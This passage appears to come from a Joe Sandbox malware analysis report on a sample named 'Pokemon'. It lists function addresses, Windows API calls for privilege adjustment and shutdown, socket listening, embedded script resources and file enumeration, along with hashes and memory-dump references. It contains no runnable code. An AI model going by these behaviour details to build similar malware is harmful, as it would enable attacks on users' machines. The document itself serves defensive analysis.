                                                                                                                                                                                                                                                                                      Function 000FF20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000F205A
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000F2087
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F2010: GetLastError.KERNEL32 ref: 000F2097
                                                                                                                                                                                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 000FF249
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                                      • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                                      • Opcode ID: ac1ed662937459cebf80953eb23eecaad25bb62608fb1dc102e9c41c98a6a787
                                                                                                                                                                                                                                                                                      • Instruction ID: d105750f647699d7b92d6d78fd4390bd375565e3f22ff6fe0ae7ecdee995f0a8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac1ed662937459cebf80953eb23eecaad25bb62608fb1dc102e9c41c98a6a787
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E01DB766102196BEBA46278AC8AFFE72AC9F08394F150531FF12E29D2D6604D51B150
                                                                                                                                                                                                                                                                                      Function 00111C61 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00111CD3
                                                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00111CE0
                                                                                                                                                                                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00111D17
                                                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00111D22
                                                                                                                                                                                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00111D51
                                                                                                                                                                                                                                                                                      • listen.WSOCK32(00000000,00000005), ref: 00111D60
                                                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00111D6A
                                                                                                                                                                                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00111D99
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 540024437-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a5d7208802f2f0ca468a1568c53176b490b0d824bed667e649632036b60e26e9
                                                                                                                                                                                                                                                                                      • Instruction ID: ce3346147b1e91800c5d60c6a48bf5c0d12f11326442331a8c134929a9e5a4db
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5d7208802f2f0ca468a1568c53176b490b0d824bed667e649632036b60e26e9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D414031600140AFDB14DF68D498BA5FBE5AF46318F1885A8D9569F292C771ECC2CBE1
                                                                                                                                                                                                                                                                                      Function 00103A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000D56C2,?,?,00000000,00000000), ref: 00103A1E
                                                                                                                                                                                                                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000D56C2,?,?,00000000,00000000), ref: 00103A35
                                                                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,000D56C2,?,?,00000000,00000000,?,?,?,?,?,?,000966CE), ref: 00103A45
                                                                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,000D56C2,?,?,00000000,00000000,?,?,?,?,?,?,000966CE), ref: 00103A56
                                                                                                                                                                                                                                                                                      • LockResource.KERNEL32(000D56C2,?,?,000D56C2,?,?,00000000,00000000,?,?,?,?,?,?,000966CE,?), ref: 00103A65
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                                      • String ID: SCRIPT
                                                                                                                                                                                                                                                                                      • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                                      • Opcode ID: f72bd45d34e5414051620b9cbe85629ddce058b69f0a0d48367c1efd0b068934
                                                                                                                                                                                                                                                                                      • Instruction ID: d4eb7eedf0d4227ebf50fe760b6ca0d40161feb70c559513ea782501b43c6aac
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f72bd45d34e5414051620b9cbe85629ddce058b69f0a0d48367c1efd0b068934
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D112771200701FFE7218B65EC49F277BBDEBC5B51F14426CB452D76A0DBB1E9418A60
                                                                                                                                                                                                                                                                                      Function 000F20AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000F1916
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000F1922
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000F1931
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000F1938
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000F194E
                                                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000000,000F1C81), ref: 000F20FB
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 000F2107
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 000F210E
                                                                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 000F2127
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,000F1C81), ref: 000F213B
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000F2142
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c8e0a3db8190e893b6f2e68e2211abe2162aafa6ea8e3dc7ac33c38f782cb027
                                                                                                                                                                                                                                                                                      • Instruction ID: a8d329bd9421db54162630619816a42b112f16aa67151f39a1074ef247368b75
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8e0a3db8190e893b6f2e68e2211abe2162aafa6ea8e3dc7ac33c38f782cb027
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D11DC72500208FFDB24DB64EC09BBE7BA9FF54355F104018EA4593920C7359D91EB64
                                                                                                                                                                                                                                                                                      Function 0010A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0010A5BD
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0010A6D0
                                                                                                                                                                                                                                                                                        • Part of subcall function 001042B9: GetInputState.USER32 ref: 00104310
                                                                                                                                                                                                                                                                                        • Part of subcall function 001042B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001043AB
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0010A5ED
                                                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0010A6BA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                                                                      • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                                      • Opcode ID: 81ee736e3d9d1fdb4b3a1e9f1f0266fcefcf1e7093a08dc8ec9158aef742044b
                                                                                                                                                                                                                                                                                      • Instruction ID: 0cb0593e7cafbf0522c85c1f5c9ee122c0a8f930d8bdf898cd083bdfd666dba8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81ee736e3d9d1fdb4b3a1e9f1f0266fcefcf1e7093a08dc8ec9158aef742044b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF416E7190020AAFCF14DFA4DD49AEEBBB8FF04310F644055E845A21E1EB719E94DFA1
                                                                                                                                                                                                                                                                                      Function 000922AD Relevance: 7.8, APIs: 5, Instructions: 308COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,?), ref: 0009233E
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00092421
                                                                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00092434
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Color$Proc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 929743424-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 57f3316b58cda13d2270c33b4f6de17406fe074f604b292b580bc3c999a80702
                                                                                                                                                                                                                                                                                      • Instruction ID: 75f724159e3d045984a26fcb1baad2abbf4f0d0f94de19a65ee880eceb65f093
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57f3316b58cda13d2270c33b4f6de17406fe074f604b292b580bc3c999a80702
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49814FF02086147EEE79663C9C98EBF15DEDB42300F15410AF102DA7D6CA598F52B277
                                                                                                                                                                                                                                                                                      Function 00112263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00113AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00113AD7
                                                                                                                                                                                                                                                                                        • Part of subcall function 00113AAB: _wcslen.LIBCMT ref: 00113AF8
                                                                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 001122BA
                                                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 001122E1
                                                                                                                                                                                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00112338
                                                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00112343
                                                                                                                                                                                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00112372
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2e2f57615e0169e4b77a0f26f759dda5eaef239bb2f83783f4aae978f47ca0c1
                                                                                                                                                                                                                                                                                      • Instruction ID: 3b82d2db5a164d96497cab8ade72414e08c5e8b273d594146daf38006214ebd8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e2f57615e0169e4b77a0f26f759dda5eaef239bb2f83783f4aae978f47ca0c1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A451C575A00200AFEB14EF64C886FAA77E5AF49754F448058F9599F3C3C774AD828BA1
                                                                                                                                                                                                                                                                                      Function 001226DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2738d51f416ebdfd341fc33302952bdb20acbc000faa3a5e5d3cc5fed0cf199e
                                                                                                                                                                                                                                                                                      • Instruction ID: c915ba99f3e5488327a84b48c1e20d394ca1d928caa5e54b1f5388a73974eff5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2738d51f416ebdfd341fc33302952bdb20acbc000faa3a5e5d3cc5fed0cf199e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD213631704220AFD7249F26E844B5E7BE5FFA5314F19806CE8498B352CB71EC52CB90
                                                                                                                                                                                                                                                                                      Function 0010D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 0010D8CE
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0010D92F
                                                                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 0010D943
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 234945975-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d9f7b4fed4bd781e636003e3daaaa08c79e5ce9a567b482198824bccdd49eeb7
                                                                                                                                                                                                                                                                                      • Instruction ID: 004e3f2654052917ca48f371b7641ac7da3524b28149252cc395c382d25c71a6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9f7b4fed4bd781e636003e3daaaa08c79e5ce9a567b482198824bccdd49eeb7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A216071500705EFE7309FA5E845BAAB7F8AB40318F10441EE68692592EBB4EA459B50
                                                                                                                                                                                                                                                                                      Function 000FE472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,000D46AC), ref: 000FE482
                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 000FE491
                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 000FE4A2
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 000FE4AE
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 60d7e574a26e7de5ffb02d32ef76e660f87e8f885e6f88dd4d7e87d7ce3ec6f0
                                                                                                                                                                                                                                                                                      • Instruction ID: 321560dad013112b0e3baa9857fd8e8539e9945ecb6b2b06906d59af62cea57c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60d7e574a26e7de5ffb02d32ef76e660f87e8f885e6f88dd4d7e87d7ce3ec6f0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11F0A730410914A792246738FC0D47A76AEAF51336B504705F935C18F0D774E9A65695
                                                                                                                                                                                                                                                                                      Function 000EE5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LocalTime
                                                                                                                                                                                                                                                                                      • String ID: %.3d$X64
                                                                                                                                                                                                                                                                                      • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                                      • Opcode ID: a51ecfdb036c39e5bdc08737f8b8dc46b1ff5e320e32dc02ed52a2bfb4a37a1c
                                                                                                                                                                                                                                                                                      • Instruction ID: 21d3578159ed9886fa149acdcb522a12418e411f233b05a09d95ddb79460c883
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a51ecfdb036c39e5bdc08737f8b8dc46b1ff5e320e32dc02ed52a2bfb4a37a1c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5D0ECA180418DEACAE49791DC88DBD727CBB28341F604862F906B1040E62099489621
                                                                                                                                                                                                                                                                                      Function 000C2992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
